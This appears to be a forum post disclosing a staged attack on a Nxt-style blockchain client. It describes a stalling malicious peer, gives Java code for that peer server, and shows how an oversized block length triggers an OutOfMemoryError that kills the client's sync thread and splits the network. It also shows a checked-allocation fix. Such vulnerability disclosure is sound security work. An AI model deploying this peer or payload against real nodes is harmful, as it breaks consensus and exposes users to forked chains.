Ok, another attack vector, but this time it'll take its sweet time to do it.
We set up a hallmarked server and wait for a getCumulativeDifficulty request...
When we get one, we answer with a higher value than is currently possible, so that the other client gets interested in our blocks.
We send the list of milestone blocks and block ids in a way that the commonBlockId is one of the most recent blocks the client has. (But that step is just for giggles.)
The client will then ask us for our nextBlocks, and we take our sweet time (what's the timeout? 5s?) and then send a big bunch of... well, no, we just send a single block. A bogus one. The block isn't checked at that point, it's just put into futureBlocks. Then the client asks us again for nextBlocks and we repeat the same procedure.
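A rough sketch of what that drip-feed endpoint could look like, using the JDK's built-in HttpServer. The path, the stall duration and the JSON shape here are my assumptions for illustration, not the real NRS peer protocol:

```java
import com.sun.net.httpserver.HttpServer;
import java.io.OutputStream;
import java.net.InetSocketAddress;
import java.nio.charset.StandardCharsets;

public class SlowDripPeer {

    // Start a peer that stalls each request, then serves exactly one bogus block.
    public static HttpServer start(int port, long stallMillis) throws Exception {
        HttpServer server = HttpServer.create(new InetSocketAddress(port), 0);
        server.createContext("/nxt", exchange -> {
            try {
                // Eat up (almost) the victim's whole read timeout before answering.
                Thread.sleep(stallMillis);
            } catch (InterruptedException ignored) {
                Thread.currentThread().interrupt();
            }
            // One bogus block per round trip. It would fail validation eventually,
            // but at this point it is merely parked in futureBlocks.
            byte[] body = "{\"nextBlocks\":[{\"bogus\":true}]}"
                    .getBytes(StandardCharsets.UTF_8);
            exchange.sendResponseHeaders(200, body.length);
            try (OutputStream os = exchange.getResponseBody()) {
                os.write(body);
            }
        });
        server.start();
        return server;
    }
}
```

With a stall just under the timeout, each round trip costs the victim ~5 seconds and us a few dozen bytes, which is what makes the "connection" so cheap to hold.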
We now have a low-bandwidth "permanent" connection with the client. The client will not start another getCumulativeDifficulty request, because that only starts a second after our "captured" thread ends... So the ways for a client to receive a new block from the network are down to two:
- via a processBlock call coming in from another peer
- via us, because if we send a block that appends nicely onto the client's last block (which he already told us about by giving us his commonBlockId), it will just get added after being checked
That means: Clients without hallmarks or behind firewalls can only get new blocks from us.
Now we have to do something to interfere with the other hallmarked servers... they still have the possibility to get a block thru another peer's processBlock call.
However, that call has a flaw (which I already outlined a few days ago), in that it only accepts blocks that nicely fit onto the current blockchain.
So we have the block generation of the non-hallmarked part of the network completely under our control, and the rest of the network can't resolve forks anymore, because every block that comes thru processBlock (or us) and fits is kept. After a while the network will nicely diverge, and we can send everyone a block that possibly fits onto his blockchain: if it fits, the client will take it, and if it doesn't, it just gets added to futureBlocks.
Now suppose we have to shut down our server, or the required bandwidth is a bit on the high side and we want to get rid of a few nodes without them being able to get back to a proper chain...
The thread that does the blockchain scanning is started with scheduleWithFixedDelay. Let's get the JDK description of that function:
Creates and executes a periodic action that becomes enabled first after the given initial delay, and subsequently with the given delay between the termination of one execution and the commencement of the next. If any execution of the task encounters an exception, subsequent executions are suppressed.
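That last sentence is the interesting part, and it's easy to demonstrate in isolation, without assuming anything about the client itself:

```java
import java.util.concurrent.Executors;
import java.util.concurrent.ScheduledExecutorService;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.atomic.AtomicInteger;

public class FixedDelayKill {

    // Schedule a task every 10 ms that throws on its first run,
    // then count how often it actually ran.
    public static int runsAfterError() throws InterruptedException {
        AtomicInteger runs = new AtomicInteger();
        ScheduledExecutorService ses = Executors.newScheduledThreadPool(1);
        ses.scheduleWithFixedDelay(() -> {
            runs.incrementAndGet();
            // Any uncaught Throwable does it: subsequent executions are suppressed.
            throw new OutOfMemoryError("simulated");
        }, 0, 10, TimeUnit.MILLISECONDS);
        Thread.sleep(300);   // time enough for ~30 runs if the task were still alive
        ses.shutdownNow();
        return runs.get();
    }

    public static void main(String[] args) throws InterruptedException {
        System.out.println(runsAfterError()); // prints 1: the task never runs again
    }
}
```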
Aha! We can kill the thread for good if we cause an exception! (And we only kill that blockchain-getting thread, the other ones will still be alive.)
Well, there is a big try {...} catch (Exception e) {} around it, so what could we possibly use? How about something that can't be caught... Who watched the thread closely?
I mentioned it before...
An OutOfMemoryError. It's an Error, not an Exception, so that catch (Exception e) block never sees it; it will cause the thread's task to die and no-one will start it again.
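A tiny self-contained demo of that, with the OutOfMemoryError simulated rather than provoked for real:

```java
public class ErrorEscapesCatch {

    // Mimics the client's big try { ... } catch (Exception e) {} wrapper.
    static String attempt() {
        try {
            try {
                throw new OutOfMemoryError("simulated");
            } catch (Exception e) {
                return "caught";      // never reached: an Error is not an Exception
            }
        } catch (Error e) {
            return "escaped";         // the Error sails past the Exception handler
        }
    }

    public static void main(String[] args) {
        System.out.println(attempt()); // prints "escaped"
    }
}
```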
So let's see where we can generate that...
If we give a client a block that fits onto its blockchain [if(block.previousBlock==lastBlock)], we directly allocate [ByteBuffer.allocate(BLOCK_HEADER_LENGTH+block.payloadLength);], so we just make sure that our payloadLength is set to INT_MAX-BLOCK_HEADER_LENGTH and the client will very likely fail, because it can't find 2GB of contiguous memory anywhere within the JVM. But you might say: what if someone started the server with a lot more RAM?
Well, actually, there's a second way, also outlined by me a few pages earlier: you generate a proper-looking block that just has its number of transactions modified, because that value is also used for an allocation without a prior sanity check. That way you can force an allocation of 16GB of contiguous memory, which will fail with near certainty on any current server, no matter how the JVM is set up.
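A sketch of the vulnerable pattern next to the obvious fix. The constant values and the cap here are made up for illustration; the real client's numbers differ:

```java
import java.nio.ByteBuffer;

public class PayloadLengthCheck {

    // Illustrative values only, not the client's real constants.
    static final int BLOCK_HEADER_LENGTH = 224;
    static final int MAX_PAYLOAD_LENGTH = 32640;

    // The vulnerable pattern: allocate straight from an attacker-supplied length.
    // With payloadLength = Integer.MAX_VALUE - BLOCK_HEADER_LENGTH this asks for
    // 2GB of contiguous heap in one go, which throws OutOfMemoryError on most JVMs.
    static ByteBuffer allocateUnchecked(int payloadLength) {
        return ByteBuffer.allocate(BLOCK_HEADER_LENGTH + payloadLength);
    }

    // The fix: bound the attacker-supplied length before touching the allocator.
    static ByteBuffer allocateChecked(int payloadLength) {
        if (payloadLength < 0 || payloadLength > MAX_PAYLOAD_LENGTH) {
            throw new IllegalArgumentException("bad payloadLength: " + payloadLength);
        }
        return ByteBuffer.allocate(BLOCK_HEADER_LENGTH + payloadLength);
    }

    public static void main(String[] args) {
        System.out.println(allocateChecked(100).capacity()); // prints 324
    }
}
```

The whole bug class is the absence of that one range check before a size taken from the wire reaches the allocator.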
So if we wait long enough, we can take over the block distribution of the network with minimal resources, because as soon as a peer asks us for blocks only once, we've got him hooked. And at that point, the network can't deal with forks anymore, which happen quite often, but it still looks ok at first sight, because we can feed all clients nice-looking blocks from each other, so groups of clients will share a blockchain, but there will be many blockchains existing in parallel.
And if we do that long enough, they won't find each other again even if we're gone, because they only sync 720 blocks back.
That's quite a nice attack, right? No spamming, no DoSing, not even very visible.
Did I forget anything?